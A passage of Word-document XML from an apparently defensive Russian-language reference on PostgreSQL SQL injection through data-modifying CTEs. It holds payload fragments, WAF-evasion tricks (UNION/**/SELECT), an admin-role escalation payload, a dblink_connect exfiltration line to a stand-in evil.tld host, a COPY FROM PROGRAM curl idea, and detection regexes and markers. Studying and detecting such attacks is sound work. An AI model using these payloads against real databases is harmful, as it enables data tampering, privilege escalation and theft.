          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">POST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PUT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как write-events, эти атаки не попадают в audit.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Cache-стратегии ломаются</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: GET-ответы кэшируются (CDN, browser), но реальное состояние БД меняется при каждом запросе.</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 блокируется extended-protocol-stacking-ограничением</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — одна команда. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">psycopg3</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asyncpg</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pgjdbc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> пропускают её через single-Parse, потому что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WAF-сигнатура `\bDROP|TRUNCATE|GRANT|CREATE|ALTER\b`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (см. 3.9.0) не покрывает </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 DML обычно не в blacklist (легитимные API имеют POST-эндпоинты с этими словами в JSON-body).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WAF-сигнатура `\bUNION\s+SELECT\b`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ловит классический UNION-канал. Payload C с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT count(*), '', 0 FROM (WITH ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — содержит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триггерит. Чтобы обойти — 3.9.6 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION/**/SELECT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) или вынести DELETE в подзапрос без UNION (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">id IN (WITH del AS (DELETE ... RETURNING id) SELECT id FROM del)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — UNION не нужен, но требует, чтобы injection-точка допускала subquery в WHERE без UNION-обёртки).</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 AS (INSERT|UPDATE|DELETE ... RETURNING ...) SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — стабильная фича с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">9.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (документация: «Data-Modifying Statements in WITH», https://www.postgresql.org/docs/current/queries-with.html#QUERIES-WITH-MODIFYING).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RETURNING</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — обязателен, если CTE используется в outer SELECT (без RETURNING результат CTE — пустой, и outer SELECT возвращает 0 строк, что обычно ломает UNION-структуру через mismatched types).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DML в CTE выполняется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">до</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> outer SELECT, независимо от того, читает ли outer SELECT данные CTE (важно: даже если outer SELECT не использует CTE-результат, DML-эффект </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">всегда</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> применяется).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Каждая DML-CTE видит снапшот на старте оператора — не результаты других DML-CTE в той же команде (см. PG-docs §7.8.2). Это значит: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH a AS (INSERT INTO t VALUES (1)), b AS (SELECT * FROM t) SELECT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b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> не увидит вставленную в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> строку.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Constraint-проверки (UNIQUE, FK) применяются в конце команды — два CTE могут попытаться вставить конфликтующие строки, конфликт сработает только при commit.</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9.1+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (все поддерживаемые версии 13–17 включают это).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на целевую таблицу + </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">USAGE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на схему. Без write-привилегии CTE падает с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">permission denied for table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 нужно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> stacked queries или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-разделение — одна команда.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 нужно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> PUBLIC доступ к каталогам — payload использует только пользовательские таблицы.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 на AWS RDS / Cloud SQL / Supabase. CTE с DML — стандартная PG-фича, провайдеры её не отключают.</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60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Data-modifying CTE — частый паттерн в legitimate-коде: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«Move row»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del AS (DELETE FROM staging WHERE ready=true RETURNING *) INSERT INTO main SELECT * FROM del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«Update + log»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upd AS (UPDATE orders SET status='paid' WHERE id=$1 RETURNING id, user_id) INSERT INTO audit (order_id, user_id, action) SELECT id, user_id, 'paid' FROM upd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«Conditional upsert»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new AS (INSERT INTO users(email) VALUES ($1) ON CONFLICT DO NOTHING RETURNING id), found AS (SELECT id FROM users WHERE email=$1) SELECT id FROM new UNION ALL SELECT id FROM found LIMIT 1</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Маркеры атаки vs легитимного использования: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Точка вызова в коде</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: legitimate CTE-DML определены в коде как фиксированные SQL-template-ы (не f-string, не конкатенация). Атака — CTE возникает из user-input.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записи с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH ... AS (UPDATE ... WHERE ...) SELECT ...</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-клауза каждый раз разная (плановая параметризация на стороне PG), но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">relname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> целевой таблицы —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user_sessions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password_resets</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (целевые таблицы для атаки). Легитимные </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-DML обычно на специфичные staging/audit-таблицы, не на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HTTP-метод</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: атака почти всегда через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (потому что POST/PUT/DELETE-эндпоинты обычно ожидают write и проверяются строже). Если в логах web-сервера видны </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">GET /...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> запросы, которые создают записи в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 это сигнал.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`pg_stat_user_tables.n_tup_ins` / `n_tup_upd` / `n_tup_del`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: рост счётчиков на таблицах, в которые эндпоинт «не должен» писать. Полезный сигнал для DBA-аудита.</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9.1 – 17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (все поддерживаемые) — фича стабильна с 9.1.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везде. Это core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14+</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MERGE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> команда (https://www.postgresql.org/docs/current/sql-merge.html) добавляет ещё один вектор внутри CTE — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH m AS (MERGE INTO t USING s ON ... WHEN MATCHED THEN UPDATE ... WHEN NOT MATCHED THEN INSERT ... RETURNING ...) SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. MERGE имеет специфику с RLS — см. 3.17.2 (CVE-2024-10978 / R8 — обход RLS на UPDATE/SELECT policy через MERGE в PG 15.0–15.3).</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главное противопоставление: 3.5 требует мульти-стейтмент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3.10.1 — одна команда. В extended-protocol drivers (psycopg3 / asyncpg / pgjdbc default) 3.5 блокируется, 3.10.1 — нет.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UNION-обёртка для CTE-результата, чтобы данные проникли в HTTP-ответ. Без UNION CTE выполняет write, но read-effect для атакующего отсутствует (slept atomic write).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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — альтернатива UNION: вместо UNION использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CAST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для leak через ошибку. CTE+CAST дают write+leak в одной команде без необходимости совпадения column-count.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 (OOB)</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WITH ex AS (INSERT INTO logs VALUES (current_user) RETURNING current_user) SELECT dblink_connect('host=' || (SELECT current_user FROM ex) || '.evil.tld...')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — write + OOB exfiltration в одной команде.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 (RCE)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WITH ins AS (COPY t FROM PROGRAM 'curl ...' RETURNING ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> —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(COPY не разрешён в CTE). Чтобы выполнить COPY FROM PROGRAM в CTE-сценарии — через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WITH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с side-effect-функцией, которая внутри делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'COPY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Payload B (UPDATE role='admin') — это сам по себе акт privilege escalation на уровне application; 3.13 — на уровне PG-роли.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3.17.2 (RLS bypass via MERGE)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — пересечение через MERGE-команду (R11, CVE-2024-10978). MERGE в CTE даёт цепочку «обход extended-protocol + обход RLS».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частично покрыто:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> регекс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">\bWITH\b.*\b(INSERT|UPDATE|DELETE)\b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> присутствует в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">app/services/judge/rules.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cte_dml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, поднимает risk до 7. Не покрыта: DML в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MATERIALIZED</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-форме CTE и в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">MERGE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-форме.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3.10 в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">summary-3.10.md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WITH Queries — Data-Modifying Statements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">R22</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, спецификация.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 second-order via WITH</w:t>
      </w:r>
      <w:r>
        <w:rPr>
